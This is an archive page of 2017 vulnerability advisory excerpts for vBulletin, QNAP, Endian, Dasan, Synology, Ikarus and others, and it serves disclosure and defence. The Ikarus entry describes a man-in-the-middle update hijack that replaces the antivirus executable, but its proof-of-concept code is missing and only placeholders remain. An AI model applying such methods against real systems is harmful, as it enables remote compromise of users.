Unauthenticated Action – Page 4 – Computer Security Articles

Credit to Author: SSD / Maor Schwartz| Date: Wed, 13 Dec 2017 10:11:35 +0000

Vulnerability Summary The following advisory describes a unauthenticated file inclusion vulnerability that leads to remote code execution found in vBulletin version 5. vBulletin, also known as vB, is a widespread proprietary Internet forum software package developed by vBulletin Solutions, Inc., based on PHP and MySQL database server. vBulletin powers many of the largest social sites … Continue reading SSD Advisory – vBulletin routestring Unauthenticated Remote Code Execution

Independent Securiteam

SSD Advisory – QNAP QTS Unauthenticated Remote Code Execution

December 11, 2017 admin Buffer Overflow, Remote Code Execution, SecuriTeam Secure Disclosure, Unauthenticated Action

Credit to Author: SSD / Maor Schwartz| Date: Mon, 11 Dec 2017 10:16:42 +0000

Vulnerability Summary The following advisory describes a memory corruption vulnerability that can lead to an unauthenticated remote code execution in QNAP QTS versions 4.3.x and 4.2.x, including the 4.3.3.0299. QNAP Systems, Inc. is “a Taiwanese corporation that specializes in providing networked solutions for file sharing, virtualization, storage management and surveillance applications to address corporate, SMB, … Continue reading SSD Advisory – QNAP QTS Unauthenticated Remote Code Execution

Independent Securiteam

SSD安全公告-Endian防火墙从存储型XSS到远程命令执行

December 11, 2017 admin Chinese Translation, Cross Site Scripting, Remote Command Execution, SecuriTeam Secure Disclosure, Unauthenticated Action

Credit to Author: SSD / Maor Schwartz| Date: Mon, 11 Dec 2017 09:17:06 +0000

漏洞概要以下安全公告描述了在Endian防火墙5.0.3版本中存在的一个存储型XSS漏洞，成功利用该漏洞可造成远程代码执行。 Endian防火墙是一个“专注Linux安全的发行版本,，它是一个独立的，统一的安全管理操作系统。 Endian防火墙基于强化的Linux操作系统。” 漏洞提交者一位独立的安全研究者向 Beyond Security 的 SSD 报告了该漏洞厂商响应厂商已经发布针对该漏洞的补丁。获取更多信息: https://help.endian.com/hc/en-us/articles/115012996087 漏洞详细信息 Endian防火墙是基于Linux的防火墙/网关。它使用不同的颜色来标记其trusted，untrusted 和DMZ网络：绿色 – trusted网络红色 – untrusted 网络橙色 – DMZ 蓝色 – WiFi 用户可控的输入没有经过充分过滤，通过从untrusted 网络（红色）发送电子邮件到DMZ上的邮件服务器（橙色），Endian防火墙会把来自untrusted 网络的电子邮件隔离。当来自trusted网络（绿色）的用户登录到Endian Firewall WebAdmin并检查隔离区中的电子邮件（Services > Mail Quarantine > quarantine）时，会执行存储型XSS脚本。漏洞证明配置环境安装Endian防火墙虚拟机并设置防火墙网络接口为以下IP：绿色 – 192.168.0.190 红色 – 192.168.0.192 设置以下密码： Web管理员（admin/Password1） SSH管理员（root/Password1）连接Webadmin接口，添加ORANGE网络并更改GREEN … Continue reading SSD安全公告-Endian防火墙从存储型XSS到远程命令执行

Independent Securiteam

SSD Advisory – Dasan Unauthenticated Remote Code Execution

December 6, 2017 admin Buffer Overflow, Remote Code Execution, SecuriTeam Secure Disclosure, Unauthenticated Action

Credit to Author: SSD / Maor Schwartz| Date: Wed, 06 Dec 2017 06:42:29 +0000

Vulnerability Summary The following advisory describes a buffer overflow that leads to remote code execution found in Dasan Networks GPON ONT WiFi Router H640X versions 12.02-01121 / 2.77p1-1124 / 3.03p2-1146 Dasan Networks GPON ONT WiFi Router “is indoor type ONT dedicated for FTTH (Fibre to the Home) or FTTP (Fiber to the Premises) deployments. That … Continue reading SSD Advisory – Dasan Unauthenticated Remote Code Execution

Independent Securiteam

SSD Advisory – Coredy CX-E120 Repeater Multiple Vulnerabilities

December 4, 2017 admin Password reset, Remote Command Execution, SecuriTeam Secure Disclosure, Unauthenticated Action

Credit to Author: SSD / Maor Schwartz| Date: Mon, 04 Dec 2017 09:37:02 +0000

Vulnerabilities Summary The following advisory describes two (2) vulnerabilities found in Coredy CX-E120 Repeater. The Coredy CX-E120 WiFi Range Extender is “a network device with multifunction, which can be using for increasing the distance of a WiFi network by boosting the existing WiFi signal and enhancing the overall signal quality over long distances. An extender … Continue reading SSD Advisory – Coredy CX-E120 Repeater Multiple Vulnerabilities

Independent Securiteam

SSD Advisory – ZTE ZXDSL Configuration Reset

November 28, 2017 admin Configuration Reset, SecuriTeam Secure Disclosure, Unauthenticated Action

Credit to Author: SSD / Maor Schwartz| Date: Tue, 28 Nov 2017 13:18:47 +0000

Vulnerability Summary The following advisory describes a configuration reset vulnerability found in ZTE ZXDSL 831CII version 6.2. ZXDSL 831CII is “an ADSL access device to support multiple line modes. It supports ADSL2/ADSL2+ and is backward compatible to ADSL, even offers auto-negotiation capability for different flavors (G.dmt, T1.413 Issue 2) according to central office DSLAM’s settings … Continue reading SSD Advisory – ZTE ZXDSL Configuration Reset

Independent Securiteam

SSD Advisory – Synology StorageManager smart.cgi Remote Command Execution

November 27, 2017 admin Remote Command Execution, SecuriTeam Secure Disclosure, Unauthenticated Action

Credit to Author: SSD / Maor Schwartz| Date: Mon, 27 Nov 2017 13:45:53 +0000

Vulnerability Summary The following advisory describes a remote command execution vulnerability found in Synology StorageManager. Storage Manager is “a management application that helps you organize and monitor the storage capacity on your Synology NAS. Depending on the model and number of installed hard drives, Storage Manager helps you accomplish the following tasks: Create different types … Continue reading SSD Advisory – Synology StorageManager smart.cgi Remote Command Execution

Independent Securiteam

SSD安全公告–Ikraus Anti Virus 远程代码执行漏洞

November 27, 2017 admin Chinese Translation, Remote Code Execution, SecuriTeam Secure Disclosure, Unauthenticated Action

Credit to Author: SSD / Maor Schwartz| Date: Mon, 27 Nov 2017 07:50:39 +0000

漏洞概要以下安全公告描述了在Ikraus Anti Virus 2.16.7中发现的一个远程代码执行漏洞。 KARUS anti.virus“可以保护你的个人数据和PC免受各种恶意软件的入侵。此外，反垃圾邮件模块可以保护用户免受垃圾邮件和电子邮件中的恶意软件攻击。选择获奖的IKARUS扫描引擎，可以有效保护自己免受网络犯罪分子的侵害。 IKARUS是世界上最好的扫描引擎，它每天都在检测未知和已知的威胁。漏洞提交者一位独立的安全研究人员向 Beyond Security 的 SSD 报告了该漏洞厂商响应更新一 CVE: CVE-2017-15643 厂商已经发布了这些漏洞的补丁。获取更多信息： https://www.ikarussecurity.com/about-ikarus/security-blog/vulnerability-in-windows-antivirus-products-ik-sa-2017-0001/ 漏洞详细信息网络攻击者（中间人攻击）可以在运行Ikraus反病毒软件的计算机上实现远程代码执行。 Windows版的Ikarus AV使用明文HTTP和CRC32校验进行更新，以及用于验证下载文件的一个更新值。另外，ikarus检查更新版本号，通过增加更新的版本号，以推动更新进程进行更新。在ikarus中执行更新的可执行文件是guardxup.exe guardxup.exe，通过端口80，发送更新请求如下： [crayon-5a1c8f5b8564c832670696/] 服务器响应如下： [crayon-5a1c8f5b85655113594378/] 通过代理，我们可以修改响应，将“update”值加1，并将响应转发给客户端。然后，客户端将通过此URL请求更新：http://mirror04.ikarus.at/updates/guardxup001005048.full ikarus服务器将返回404： [crayon-5a1c8f5b8565a461056357/] 但我们可以用IKUP格式修改上述响应： [crayon-5a1c8f5b8565f465486246/] 然后，我们将修改过后的响应转发到客户端，在那里用我们的可执行文件替换guardxup.exe。漏洞证明安装mitmproxy 0.17 – pip install mitmproxy == 0.17 要使用这个脚本，在透明代理模式下，通过中间人80端口转发客户端的通信流量。设置你的防火墙规则以拦截8080端口上的通信流量： [crayon-5a1c8f5b85664388983146/] 然后执行如下脚本： ./poc.py file_to_deploy.exe [crayon-5a1c8f5b85668324361117/]